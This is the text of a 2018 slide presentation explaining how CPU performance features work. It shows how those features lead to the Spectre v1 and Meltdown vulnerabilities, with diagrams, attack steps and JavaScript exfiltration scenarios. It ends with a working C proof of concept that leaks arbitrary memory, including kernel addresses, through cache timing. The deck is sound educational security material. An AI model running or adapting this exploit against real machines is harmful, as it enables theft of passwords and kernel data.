The Spectre of Meltdowns

Andriy Berestovskyy
2018
semihalf
berestovskyy

The Spectre of Meltdowns
● Evolution of CPUs
● Spectre v1 Attack
● Security Holy Grail
● Meltdown (v3) Attack
● Fixes
● Spectre-Based Meltdown PoC
CPU?

Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
Basic means
simple, right?

Modern CPU Die
Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
Why is it so complicated?
About 2 billion
transistors
How does it
work?

CPU Basic Operation Cycle*
Hardware
implementation?
Start
Fetch Instruction at PC
Decode Instruction
Load Data From Memory
Execute Instruction
Write Data to Memory
Update Registers and PC
* Instruction Cycle

Simple CPU Implementation*
[Block diagram: PC, Memory, Instruction Fetch/Decode, Registers, ALU]
Stages: Instruction Fetch, Decode/Load, Execute, Write
Performance?
* Simplified, just for an example

Instructions Per Second (IPS) — measure of a
computer's processor speed.
— Wikipedia
MIPS?
FLOPS?

4MHz CPU Performance
Cycle    1      2       3        4      5      6       7        8      9
mov ...  Fetch  Decode  Execute  Write
xor ...                                 Fetch  Decode  Execute  Write
cmp ...                                                                Fetch
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
4M cycles per second / 4 cycles per instruction = 1 MIPS
More performance! Solutions? ...one cycle per instruction?

Instruction pipelining — process different parts of
instructions in parallel, i.e. an attempt to keep
every part of the CPU busy.
— Wikipedia
Let’s do it!

CPU with Pipeline*
[Block diagram: PC, Memory, Registers, ALU; pipeline stage registers Fetch/Decode, Decode/Execute, Execute/Write]
Performance?
* Intel i486 and newer

Performance: Instruction Pipelining
Basic Pipeline
Cycle    1      2       3        4        5        6        7      8  9
mov ...  Fetch  Decode  Execute  Write
xor ...         Fetch   Decode   Execute  Write
cmp ...                 Fetch    Decode   Execute  Write
div ...                          Fetch    Decode   Execute  Write
How many MIPS for a 4MHz CPU now?
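The cycle counts in the pipeline diagram can be checked with a small calculation. This is a minimal sketch that assumes an ideal pipeline with no stalls; the function names are made up for illustration.

```c
#include <stdint.h>

/* Cycles to run n instructions when each one occupies the CPU for all
 * `stages` cycles before the next may start (no pipelining). */
uint64_t cycles_unpipelined(uint64_t n, uint64_t stages)
{
    return n * stages;
}

/* Cycles with an ideal pipeline: the first instruction needs `stages`
 * cycles, every following one completes one cycle later.
 * Assumes no stalls, which real pipelines cannot guarantee. */
uint64_t cycles_pipelined(uint64_t n, uint64_t stages)
{
    return n == 0 ? 0 : stages + n - 1;
}
```

For the three instructions mov, xor, cmp on a 4-stage pipeline this gives 12 cycles without pipelining and 6 with it; as n grows, the pipelined cost approaches one cycle per instruction.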

4MHz CPU with Pipeline
Cycle    1      2       3        4        5        6
mov ...  Fetch  Decode  Execute  Write
xor ...         Fetch   Decode   Execute  Write
cmp ...                 Fetch    Decode   Execute  Write
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
4M cycles per second / 1 cycle per instruction = 4 MIPS
More performance! ...more MHz?

8MHz CPU with Pipeline
Cycle    1  2  3  4  5  6  ...  17
mov ...  F  D  E  W
xor ...     F  D  E  W
cmp ...        F  D  E  W
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
More performance?

40MHz CPU Performance
[Pipeline diagram: mov, xor, cmp overlapped, one instruction per cycle]
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
40M cycles per second / 1 cycle per instruction = 40 MIPS?
Really?

Clock Speed Does Not Scale
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Why?

Memory Trends
Source: https://en.wikipedia.org/wiki/CAS_latency (First Word)
DRAM latency has stayed about the same since the mid-'90s
Solutions?
More
performance!
...but DRAM is
slow...

Cache — faster memory, closer to a CPU, which
stores copies of frequently used main memory
locations.
— Wikipedia
Let’s do it!
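To make the idea of a cache concrete, here is a toy software model of a direct-mapped cache. It is only a sketch: the line size, the number of lines and all names are assumptions chosen for illustration, not the parameters of any real CPU.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define LINE_SIZE 64u   /* bytes per cache line (assumed) */
#define NUM_LINES 8u    /* tiny cache so evictions are easy to see */

struct toy_cache {
    bool     valid[NUM_LINES];
    uint64_t tag[NUM_LINES];
};

void cache_init(struct toy_cache *c)
{
    memset(c, 0, sizeof(*c));
}

/* Returns true on a hit. On a miss the line is filled, evicting
 * whatever previously mapped to the same slot. */
bool cache_access(struct toy_cache *c, uint64_t addr)
{
    uint64_t line = addr / LINE_SIZE;
    uint64_t slot = line % NUM_LINES;
    uint64_t tag  = line / NUM_LINES;

    if (c->valid[slot] && c->tag[slot] == tag)
        return true;
    c->valid[slot] = true;
    c->tag[slot] = tag;
    return false;
}
```

The first access to an address misses, a second access to the same line hits, and an access to another address that maps to the same slot evicts the line again. Whether a given access hit or missed is exactly the state that the later cache side-channel slides observe through timing.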

CPU with Pipeline and Cache*
[Block diagram: the pipelined CPU (PC, Memory, Registers, ALU) extended with an Instruction Cache, a Data Cache and a Write Buffer]
What’s changed?
Performance?
* Intel i486 and newer

CPU with Pipeline and Cache
[Pipeline diagram: mov, div, xor, cmp; stalls caused by a cache miss and by a long-running div]
40M cycles per second / ~4 cycles per instruction = ~10 MIPS
Stalls :(
More performance! ...but the pipeline sometimes stalls... Solution?

Superscalar CPU — executes more than one
instruction during a clock cycle using
different execution units.
— Wikipedia
Let’s do it!

Superscalar CPU Instruction Cycle
Performance?
Start
Fetch Two Instructions
Decode Two Instructions
Load Order: D1, D2
Execute Two Instructions
Write Order: D1, D2
Update Order: D1, D2
* Intel Pentium and newer
Why order?

Superscalar CPU with Cache
[Pipeline diagram: mov, div, xor, cmp issued two per cycle; stalls caused by a cache miss, by the long-running div, and by read and write ordering]
40M CPS / ~4 CPI * 1.5 instructions per cycle = ~15 MIPS
Ordering :(
More performance! ...but stalls due to ordering... Solutions?
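The throughput estimates on the slides so far (1, 4, ~10 and ~15 MIPS) all follow the same arithmetic. A minimal sketch in C; the function name and parameter names are made up for illustration.

```c
/* Estimated millions of instructions per second.
 * clock_hz: clock frequency in Hz
 * cpi:      average cycles per instruction (stalls included)
 * width:    average instructions issued per cycle (1.0 for a scalar CPU) */
double estimate_mips(double clock_hz, double cpi, double width)
{
    return clock_hz / cpi * width / 1e6;
}
```

With the slide values, estimate_mips(4e6, 4, 1) gives 1, estimate_mips(4e6, 1, 1) gives 4, estimate_mips(40e6, 4, 1) gives 10 and estimate_mips(40e6, 4, 1.5) gives 15. The model is deliberately crude: it folds every stall into a single average CPI.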

Out-of-Order (dynamic) Execution — processor
executes instructions in order of input data and
execution units availability, not by their original
order in a program.
— Wikipedia
Let’s do it!

Out of Order CPU*
[Pipeline diagram: mov, div, xor, cmp executed out of order around a cache miss and the long-running div]
Read reordering :(
Write reordering :(
Re-order buffers on Intel CPUs
Why? Improves the average instructions per cycle ratio
What about conditional jumps?
* Intel Pentium Pro and newer

Conditional Jumps
uint8_t array[256];
size_t array_size = 256;

uint8_t bounds_check(size_t idx)
{
    if (idx < array_size)
        return array[idx];
    return 0;
}

bounds_check:
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
Full source: https://godbolt.org/g/Snb13E
Performance?

OoO CPU vs Conditional Jumps
[Pipeline diagram: cmp waits on a cache miss; jbe depends on cmp, so the next PC is unknown: mov or ret? Stall?]
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
More performance! ...but the next instruction is unknown... Solutions?

Speculative Execution — perform some tasks
that may not be needed.
— Wikipedia
Let’s do it!

CPU with Speculative Execution
[Pipeline diagram: cmp waits on a cache miss; jbe depends on cmp; instead of stalling, the CPU continues with mov, so mov* (itself a cache miss) and ret* run as speculation]
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
Continue with mov!
What if speculation is incorrect?

Branch Miss
[Pipeline diagram: once cmp completes, jbe turns out to be mispredicted; the speculative mov* and ret* are discarded and ret is fetched again, possibly with an icache miss. The lost cycles are the branch miss penalty]
Flush the pipeline!
More performance! ...but branch misses are very expensive... Options?

Speculation Options
    xor %eax, %eax
    jbe .L1
Branch taken:
    ret
    ...
Branch not taken:
    mov array(%rdi), %eax
    ret
    ...
Options:
1. Execute left branch
2. Execute right branch
3. Execute both branches
4. Other?
Pros/cons?
Solution?

Branch Predictor — digital circuit that tries to
guess which way a branch will go
before this is known definitively.
— Wikipedia
How does it
work?

Branch Predictor
[Diagram: the last n bits of the instruction address (here, of jbe) index a Branch History Table with 2^n elements; each element holds recent taken/not-taken outcomes (Y/N) and yields the prediction]
Source: https://en.wikipedia.org/wiki/Branch_predictor
Let’s do it!
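A table indexed by the low address bits can be sketched in a few lines of C. This sketch swaps in 2-bit saturating counters for the per-entry history shown on the slide, which is an assumption made for brevity; real predictors are considerably more elaborate, and all names here are made up.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define BHT_BITS 4u                 /* n: address bits used as index */
#define BHT_SIZE (1u << BHT_BITS)   /* 2^n table elements */

struct bht {
    uint8_t counter[BHT_SIZE];      /* 0..1 predict not taken, 2..3 taken */
};

void bht_init(struct bht *t)
{
    memset(t->counter, 1, sizeof(t->counter));  /* start weakly not taken */
}

static unsigned bht_index(uint64_t branch_addr)
{
    return (unsigned)(branch_addr & (BHT_SIZE - 1));
}

bool bht_predict(const struct bht *t, uint64_t branch_addr)
{
    return t->counter[bht_index(branch_addr)] >= 2;
}

/* Called once the real outcome of the branch is known. */
void bht_update(struct bht *t, uint64_t branch_addr, bool taken)
{
    uint8_t *c = &t->counter[bht_index(branch_addr)];

    if (taken && *c < 3)
        (*c)++;
    else if (!taken && *c > 0)
        (*c)--;
}
```

Two properties matter for the attack slides later on: a few calls with the same outcome are enough to train an entry, and two branches whose addresses share the low n bits share one entry.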

CPU with Branch Predictor
[Pipeline diagram: cmp waits on a cache miss; jbe depends on cmp; prediction: do not take branch, so mov* (itself a cache miss) and ret* run as speculation]
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
More performance! ...but there are no more ideas... Solutions?

Multi-Core Processor — CPU with two or more
independent processing units called cores, which
read and execute program instructions.
— Wikipedia
How many
cores?

CPU Trends
Source: https://en.wikipedia.org/wiki/List_of_Intel_CPU_microarchitectures and https://en.wikipedia.org/wiki/Transistor_count
CPU clock limit?
72 cores * 4 = 288 threads
Summary?

CPU Performance Summary
+ Instruction Pipelines
+ Memory Cache
+ Superscalar Execution
+ Out of Order Execution
+ Speculative Execution
+ Branch Prediction
+ Multiple Cores
± CPU Clock (to a certain extent)
Modern CPU
Core?

Modern CPU Core
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Front end: Branch Prediction Unit, 32K L1 Instruction Cache, Legacy Decode Pipeline, Decoded Icache, MSROM
Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
Port 0: ALU, Vec ALU, Vec Shft, Vec Add, Vec Mul, FMA, DIV, Branch2
Port 1: ALU, Fast LEA, Vec ALU, Vec Shft, Vec Add, Vec Mul, FMA, Slow Int, Slow LEA
Port 5: ALU, Fast LEA, Vec ALU, Vec Shuff
Port 6: ALU, SHFT, Branch1
Port 2: LD/STA
Port 3: LD/STA
Port 4: STD
Port 7: STA
Memory: 32K L1 Data Cache, 256K L2 Cache, L3
Modern CPU Die?

Modern CPU Die
[Die diagram: six CPU cores, each with several ALUs, L1/L2 caches and a BPU; shared L3 cache slices, GPU, interconnect, system agent and memory controller]
Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/
So, why is it so complicated?
About 2 billion transistors

Because we need performance!
So, what about
Spectre et al?

All Your Secrets Belong to Us
uint8_t array[256 * 4096];

uint8_t bounds_check(size_t idx)
{
    if (idx < array_size)
        return array[idx * 4096];
    return 0;
}

bounds_check:
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
.L1:
    ret
Full source: https://godbolt.org/g/Snb13E
Execution?
Why?

Bounds Check on Modern CPU
[Pipeline diagram: cmp waits on a cache miss; jbe depends on cmp; sal* and mov* run as speculation, and mov* itself misses the cache]
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
What about cache?

Memory Prior Cache Misses
[Virtual memory diagram at the current cycle: array_size and array (array_size * 4096 bytes) are both "cold", not cached; cmp misses on array_size while sal* and mov* run as speculation and mov* misses on array]
What will happen after execution?

Memory After Cache Misses
[Virtual memory diagram at the current cycle: after both cache misses are served, array_size and the array element read by the speculative mov* are cached]
What if we missed the branch?

Memory After Branch Miss
[Virtual memory diagram: jbe resolves as a branch miss and execution continues at .L1: ret, but the array element loaded by the speculative mov* stays cached]
Flush the pipeline!
Side effect!
How to detect cache side effect?

Observing Cache Side Effects*
uint8_t array[256 * 4096];
...
for (i = 0; i < 256; i++) {
    start = rdtscp();
    tmp = array[i * 4096];
    cycles = rdtscp() - start;
    ...
}
[Virtual memory diagram: array is "cold" memory except for the element cached as a speculation side effect]
How can we exploit these side effects?
* Simplification
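Once the 256 access times have been measured, picking out the cached element is a plain minimum search. The sketch below covers only that selection step; the function name and the threshold parameter are assumptions for illustration, and the timings themselves would come from a loop like the one on the slide.

```c
#include <stddef.h>
#include <stdint.h>

#define BYTE_VALUES 256

/* Returns the index of the fastest probe if it is faster than
 * `threshold` cycles, or -1 if no probe looks cached. */
int fastest_probe(const uint64_t cycles[BYTE_VALUES], uint64_t threshold)
{
    int best = -1;
    uint64_t best_cycles = threshold;

    for (size_t i = 0; i < BYTE_VALUES; i++) {
        if (cycles[i] < best_cycles) {
            best_cycles = cycles[i];
            best = (int)i;
        }
    }
    return best;
}
```

A sensible threshold depends on the machine; in practice it sits somewhere between a typical cache hit and a typical DRAM access and is best found by measurement.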

Memory Before Indirect Read
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];

uint8_t bounds_check(uint64_t idx)
{
    if (idx < array_size) {
        uint8_t byte = base_array[idx];
        return side_effects[byte * 4096];
    }
    return 0;
}

bounds_check(unsigned long):
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov base_array(%rdi), %eax
    sal $12, %eax
    mov side_effects(%rax), %eax
.L1:
    rep ret
[Virtual memory diagram: array_size, base_array and side_effects; byte = base_array[idx] is precached data; two accesses are marked "Cache miss!"]
Full source: https://github.com/berestovskyy/spectre-meltdown
Why?
After?

Memory After Indirect Read
[Same bounds_check() code as on the previous slide. Virtual memory diagram: after the read, side_effects[byte * 4096] is cached next to the precached data, array_size and byte = base_array[idx]]
Pipeline?

Bounds Check Pipeline
[Pipeline diagram: cmp waits for array_size; jbe depends on cmp; mov*, sal* and mov* run as speculation]
Data is precached
Speculative read from side_effects
Can we reach outside the array?

Bounds Check Bypass
[Same bounds_check() code, with the loaded byte now named secret:]
    uint8_t secret = base_array[idx];
    return side_effects[secret * 4096];
[Virtual memory diagram: secret = base_array[idx] with idx = &secret - base_array, i.e. the index points outside base_array at the precached secret; side_effects[secret * 4096] gets cached speculatively]
Spectre?

Putting It All Together: Spectre v1
1. Call bounds_check() a few times with a valid index
2. Flush array_size from the cache to force a cache miss
3. Call bounds_check() with an index pointing to the secret
4. The secret is used speculatively as an index into side_effects
5. Observe side_effects access times
Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
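The five steps can be walked through in a purely software model. The sketch below is not an exploit and touches no real cache: the cache state, the branch predictor and the speculative load are all simulated with ordinary variables, and every name in it is made up for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BYTE_VALUES 256

/* Toy machine state. Everything here is a model, not real hardware. */
static uint8_t memory[32] = "0123456789abcdefS3cr3t"; /* base_array, then secret */
static const size_t array_size = 16;
static bool line_cached[BYTE_VALUES];  /* one flag per side_effects page */
static bool array_size_cached = true;
static int  taken_history;             /* >0: predictor expects in-bounds */

/* Models bounds_check(): architecturally returns 0 for a bad index,
 * but a mispredicted branch still touches a side_effects page. */
uint8_t model_bounds_check(size_t idx)
{
    if (idx >= sizeof(memory))
        return 0;                      /* keep the model itself in bounds */

    bool in_bounds = idx < array_size;
    bool speculate = !array_size_cached && taken_history > 0;

    if (in_bounds || speculate)
        line_cached[memory[idx]] = true;   /* cache side effect */
    array_size_cached = true;              /* the compare loaded it */
    if (in_bounds) {
        taken_history++;
        return memory[idx];
    }
    taken_history = 0;
    return 0;
}

uint8_t model_leak_byte(size_t idx)
{
    for (size_t i = 0; i < 5; i++)             /* 1. train with valid index */
        model_bounds_check(i);
    memset(line_cached, 0, sizeof(line_cached)); /* flush side_effects */
    array_size_cached = false;                 /* 2. flush array_size */
    model_bounds_check(idx);                   /* 3.+4. speculative read */
    for (size_t v = 0; v < BYTE_VALUES; v++)   /* 5. probe side_effects */
        if (line_cached[v])
            return (uint8_t)v;
    return 0;
}
```

In this model, model_leak_byte(16) returns 'S', the first byte stored right after the 16-byte array, even though model_bounds_check(16) itself returns 0. On real hardware the last step is a timing measurement rather than a flag lookup, which is where the noise and the repeated tries in the PoC come from.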

Spectre v1 Summary
1. Reason: cache side effects
2. The source code is valid, no (easy) fix in software
3. Cache side-channel might be fixed in the future
4. Reads any byte within the current process's memory
Is it even
dangerous?

Spectre v1 Victims
1. eBPF
2. Java
3. JavaScript (ouch!)
   Online checker: https://xlab.tencent.com/special/spectre/
4. Other JIT engines
Scenarios?

JavaScript Attack Scenario
Web Browser                   Web Server
1. GET /                  ->
2.                        <-  OK index.html
   Parse index.html
3. GET /spectre.js        ->
4.                        <-  OK spectre.js
   Execute spectre.js
5. HTTP POST secrets.json ->
Execution?

JavaScript Attack Execution
if (index < base_array.length) {
    secret = base_array[index | 0];
    secret = ((secret * 4096) | 0);
    tmp ^= side_effects[secret | 0] | 0;
}

JavaScript JIT output:
    cmp r15, [rbp - 0xe0]
    jnc 0x24dd099bb870
    lea rsi, [r12 + rdx * 1]
    mov rsi, [rsi + r15 * 1]
    shl rsi, 12
    and rsi, 0x1ffffff
    mov rsi, [rsi + r8 * 1]
    xor rsi, rdi
    mov rdi, rsi
[Memory diagram: inside the browser process, the JIT sandbox holds base_array (with its length) and side_effects; the browser passwords lie outside the sandbox but in the same address space]
Source: Spectre Attacks: Exploiting Speculative Execution, Paul Kocher et al
Meltdown?

Most important security feature?

Process isolation — hardware and software
technologies designed to protect each process
from other processes by disallowing
inter-process memory access.
— Wikipedia
Hardware?
In practice?

Virtual Memory — abstraction of the resources
that are actually available on a given machine.
Combination of hardware and software maps
Virtual Addresses into Physical Addresses.
— Wikipedia
How to map Virtual
to Physical?

Translation Lookaside Buffer (TLB) — stores recent
translations of virtual memory to physical memory,
i.e. address-translation cache. Part of CPU
memory-management unit (MMU).
— Wikipedia
Drawings!
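Before the drawings, the translation step itself can be sketched in C. This is a toy fully associative TLB with 4 KB pages and round-robin replacement; the sizes, the replacement policy and all names are assumptions for illustration only.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SHIFT  12u                        /* 4 KB pages */
#define PAGE_MASK   ((1ull << PAGE_SHIFT) - 1)
#define TLB_ENTRIES 4u                         /* deliberately tiny */

struct tlb_entry {
    bool     valid;
    uint64_t vpn;   /* virtual page number */
    uint64_t pfn;   /* physical frame number */
};

struct tlb {
    struct tlb_entry entry[TLB_ENTRIES];
    unsigned next;  /* round-robin replacement slot */
};

/* Remember the translation of the page containing vaddr. */
void tlb_insert(struct tlb *t, uint64_t vaddr, uint64_t paddr)
{
    struct tlb_entry *e = &t->entry[t->next];

    e->valid = true;
    e->vpn = vaddr >> PAGE_SHIFT;
    e->pfn = paddr >> PAGE_SHIFT;
    t->next = (t->next + 1) % TLB_ENTRIES;
}

/* Returns true and stores the physical address on a TLB hit.
 * On a miss real hardware would walk the page tables instead. */
bool tlb_translate(const struct tlb *t, uint64_t vaddr, uint64_t *paddr)
{
    for (unsigned i = 0; i < TLB_ENTRIES; i++) {
        const struct tlb_entry *e = &t->entry[i];

        if (e->valid && e->vpn == (vaddr >> PAGE_SHIFT)) {
            *paddr = (e->pfn << PAGE_SHIFT) | (vaddr & PAGE_MASK);
            return true;
        }
    }
    return false;
}
```

The page offset (the low 12 bits) passes through unchanged; only the page number is looked up. Because the table is small, switching to another address space normally means losing its contents, which is relevant to the syscall discussion that follows.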

Process Isolation
[Diagram: Process 1 (main(), array), Process 2 (main()) and the Kernel (syscall(), data) each have their own 64 bit virtual address space, mapped by the OS onto Physical Memory and Swap and translated using the TLB]
Why?
How to communicate?

System Call — programmatic way to request a
service from the kernel. A syscall is a privilege level
switch, not a process context switch, i.e. the syscall is
processed in the user process context.
— Wikipedia
Why no process
context switch?

Skylake TLB Cache Hierarchy
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Level             Page Size             Entries
Instruction       4KB                   128
Instruction       2MB/4MB               8 per thread
First Level Data  4KB                   64
First Level Data  2MB/4MB               32
First Level Data  1GB                   4
Second Level      Shared 4KB and 2/4MB  1536
Second Level      1GB                   16
Not that much :(
So, if no process context switch... how to access kernel data?

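Kernel Mapping
[Diagram: the Kernel (syscall(), data) is mapped, from Start Kernel Map upwards, into the virtual address space of every process, next to Process 1 (main(), array1) and Process 2 (main()); SYSCALL gives the kernel data access without a process context switch. Everything maps onto Physical Memory and Swap]
Bomba!
Now, how to protect kernel data?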

CPU Privilege Level — per-process operating mode
restrictions on type and scope of operations that
can be performed, i.e. OS to run with more
privileges than application software.
— Wikipedia

Privilege Level Switch
[Diagram: one virtual address space holding the Process (main(), array1) and, from Start Kernel Map upwards, the Kernel (syscall(), data)]
privilege level switch (SYSCALL)
kernel is able to access process data
process is not able to access kernel data
Mega!
So, what is Meltdown?

Meltdown — hardware vulnerability, which allows
a rogue process to read all memory, even when it is
not authorized to do so.
— Wikipedia
Kernel is mapped to
each process...

Meltdown
[Diagram: one virtual address space holding the Process (main(), array1) and, from Start Kernel Map upwards, the Kernel (syscall(), data)]
kernel is able to access process data
process is able to read kernel data
Meltdown :(
Let’s do it!

Recap: Bounds Check Bypass
[Same bounds_check() code and virtual memory diagram as on the Bounds Check Bypass slide: the precached secret is read as secret = base_array[idx] and leaks through side_effects]
Can we exploit it to access kernel data?

Spectre v1 Attack on Kernel Data
[Same bounds_check() code and virtual memory diagram, with the secret replaced by precached kernel data: secret = base_array[idx] now reads from the kernel mapping]
How?

Putting It All Together: Meltdown (v3)
1. Find the address of a kernel structure (out of scope)
2. Invoke a system call to cache this structure
3. Do Spectre v1, but with the kernel address:
   a. Call bounds_check() a few times with a valid index
   b. Flush array_size from the cache to force a cache miss
   c. Call bounds_check() with an index pointing to the kernel structure
   d. The secret is used speculatively as an index into side_effects
   e. Observe side_effects access times
Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?

Meltdown (v3) Summary
1. Reason 0: hardware bug (accessing memory
and checking privileges in parallel)
2. Reason 1: cache side effects (i.e. Spectre)
3. Reason 2: kernel mapped into every process,
so a syscall is a privilege level switch, not a process context switch
4. Reads any mapped and cached byte
Is it even
dangerous?

Meltdown Attack Scenario
Web Browser                       Web Server
1. GET /                      ->
2.                            <-  OK index.html
   Parse index.html
3. GET /meltdown.js           ->
4.                            <-  OK meltdown.js
   Execute meltdown.js with valid syscalls
5. HTTP POST kernel-data.json ->
How to fix?

Fixes: An Open Question
Spectre v1:
1. Speculation barrier
2. Other?
Meltdown (v3):
1. Process context switch instead of privilege level switch
2. PCID/ASID
3. Other?
Spectre-Based Meltdown PoC
/* Headers are omitted on the slide; assumed from the calls used below */
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <x86intrin.h>

#define MIN_READS 100
#define MAX_READ_CYCLES 1000
#define BRANCH_TRAINS 6
#define BYTE_VALUES 256
#define PAGE_SIZE 4096

size_t array_size = BRANCH_TRAINS;
uint8_t side_effects[BYTE_VALUES * PAGE_SIZE] = {1};
uint8_t base_array[BRANCH_TRAINS];
uint8_t tmp;
char secret[] = "My password";
int fd;

uint8_t bounds_check(uint64_t idx)
{
    if (idx < array_size)
        return side_effects[base_array[idx] * PAGE_SIZE];
    return 0;
}

uint8_t read_any_byte(uint64_t addr);

int main(int argc, char **argv)
{
    uint8_t byte;
    uint64_t addr = (uint64_t)&secret;

    /* No argument: default kernel address; 0: address of the local secret */
    addr = argc < 2 ? 0xffffffff81800040ULL
                    : strtoull(argv[1], NULL, 0);
    addr = addr != 0 ? addr : (uint64_t)&secret;
    if ((fd = open("/proc/version", O_RDONLY)) < 0)
        perror("Error opening /proc/version");
    do {
        byte = read_any_byte(addr);
        printf("0x%" PRIx64 " = 0x%x ('%c')\n", addr++,
               byte, byte);
    } while (byte != 0);
    return 0;
}

Read Any Byte()
uint8_t read_any_byte(uint64_t addr)
{
    size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];

    /* Turn the absolute address into an index relative to base_array */
    addr -= (uint64_t)&base_array;
    for (i = 0; i < BYTE_VALUES; i++)
        mins[i] = SIZE_MAX;
    for (tries = 0; tries < MIN_READS * 5; tries++) {
        char buf[PAGE_SIZE];

        if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
            perror("Error reading /proc/version");
        ...
    }
    return 0;
}

Shown next to it on the slide:
        /* The mask keeps the index valid, except when i % BRANCH_TRAINS
         * is 0: then the mask is all ones and addr is passed as is. */
        for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
            _mm_clflush(&array_size);
            sched_yield();
            tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
        }
        /* Time each side_effects page; a clearly faster one is the byte */
        for (i = 1; i < BYTE_VALUES; i++) {
            __sync_synchronize();
            register uint64_t start_tsc = __rdtsc();
            tmp = side_effects[i * PAGE_SIZE];
            __sync_synchronize();
            register uint64_t cycles = __rdtsc() - start_tsc;
            _mm_clflush(&side_effects[i * PAGE_SIZE]);
            if (cycles > MAX_READ_CYCLES)
                break;
            else if (cycles < mins[i])
                mins[i] = cycles;
            if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
                return i;
            sum += cycles;
            cnt++;
        }

References
1. Meltdown and Spectre
https://meltdownattack.com/
2. Spectre Attacks: Exploiting Speculative Execution by Paul Kocher et al
https://spectreattack.com/spectre.pdf
3. Meltdown by Moritz Lipp et al
https://meltdownattack.com/meltdown.pdf
4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism
https://developer.arm.com/support/security-update
5. Intel Software Developer Manuals
https://software.intel.com/en-us/articles/intel-sdm
6. Spectre-based Meltdown proof of concept in just 99 lines of code:
https://github.com/berestovskyy/spectre-meltdown
